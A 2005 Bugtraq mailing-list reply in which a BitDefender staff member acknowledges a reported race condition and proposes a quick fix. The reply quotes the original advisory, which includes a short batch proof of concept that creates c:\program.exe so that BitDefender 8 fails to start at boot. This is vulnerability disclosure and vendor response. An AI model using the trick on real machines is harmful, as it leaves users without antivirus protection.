[38578] in bugtraq
Re: BitDefender 8 - Race condition vulnerability
daemon@ATHENA.MIT.EDU (Ovidiu Constantin)
Mon Apr 25 16:05:08 2005
Content-Type: multipart/mixed; boundary="=-bd-boundary-n7s5X0sFMGjRUiMi"
Mime-Version: 1.0
From: Ovidiu Constantin <oconstantin@bitdefender.com>
To: bugtraq@securityfocus.com, SecuBox fRoGGz <unsecure@writeme.com>
In-Reply-To: <20050423030310.19443.qmail@www.securityfocus.com>
Date: Mon, 25 Apr 2005 17:47:16 +0300
Message-Id: <1114440437.10058.2.camel@localhost.localdomain>
This is a multipart message in MIME format,
containing the original message body
and a footer added by BitDefender
--=-bd-boundary-n7s5X0sFMGjRUiMi
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-ZjiiDeKfpC+w7dav/vlY"
--=-ZjiiDeKfpC+w7dav/vlY
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
=CEn data de S=EE, 23-04-2005 la 03:03 +0000, SecuBox fRoGGz a scris:
>=20
> -----------------------------
> Product: BitDefender
> Version: 8
> Tested on: Windows 2000 SP4
> Vulnerability: Race condition
> -----------------------------
>=20
> BACKGROUND
> ----------
> BitDefender ensures the most advanced antivirus protection, as well as da=
ta=20
> confidentiality, active content control and Internet filtering.
> A powerful antivirus tool with features that best meet your security need=
s.
> Source: www.bitdefender.com
>=20
>=20
> VULNERABLE PRODUCTS
> -------------------
> BitDefender 8 Professional Plus
> BitDefender 8 Standard Edition
> Maybe other...
>=20
>=20
> RACE CONDITION
> --------------
> At Windows startup, when a file named: program.exe is found on c:\=20
> Windows send an alert message, messagebox controls are:
> 2 buttons -> "Rename" or "Ignore"
> 1 checkbox -> [X] Do not do this verification on startup.=20
> (Sorry, haven't got the exact english message)
>=20
> At this moment, BitDefender can't start, so we have a session without vir=
us protection.
>=20
>=20
> PROOF OF CONCEPT
> ----------------
> Open your notepad.exe and paste this batch script.
>=20
> @echo off
> echo #-------------------------------------------------------#
> echo [ SecuBox - Proof of Concept (04.12.2005) ]
> echo #-------------------------------------------------------#
> echo # This script just create the race condition. #
> echo # It might be use by virus. #
> echo # Now, reboot your computer and watch your BitDef ! #
> echo #-------------------------------------------------------#
> echo # Be carefull, for virus protection need another reboot #
> echo # Closing your Windows session is not sufficient ! #
> echo #-------------------------------------------------------#
> echo BitDef PoC > c:\program.exe
> pause
> exit
>=20
>=20
> EXPLOITATION
> ------------
> Save this batch script as TEST.BAT and try it.
>=20
>=20
> VENDOR STATUS
> -------------
> Vendor have been contacted but no reply ...
>=20
>=20
> CREDITS
> ----------------------
> SecuBox Labs - fRoGGz
> unsecure@writeme.com
> ----------------------
Thanks for informing us about this issue. Now we are aware of it and in
short time all BitDefender installation kits will be updated in order
to fix it. The quick fix is to put all the start up commands between "
".
We will keep you posted.
--=20
Ovidiu Constantin - PGP/GPG Key ID 0xBF7F01FF
BitDefender Linux/Unices Testing Project Manager
SOFTWIN / Data Security Division / BitDefender
http://linux.bitdefender.com/
--=-ZjiiDeKfpC+w7dav/vlY
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (GNU/Linux)
iD8DBQBCbQL04a9c+r9/Af8RAk3wAJ0WWN62bBLmGLFOlbTi1sUYO52j8wCeM2wQ
mNVE2PRw2txyWZLrXQCbIfU=
=rUIL
-----END PGP SIGNATURE-----
--=-ZjiiDeKfpC+w7dav/vlY--
--=-bd-boundary-n7s5X0sFMGjRUiMi
Content-Type: text/plain; name="BitDefender.txt"
Content-Disposition: inline; filename="BitDefender.txt"
--
This message was scanned for spam and viruses by BitDefender.
For more information please visit http://linux.bitdefender.com/
--=-bd-boundary-n7s5X0sFMGjRUiMi--
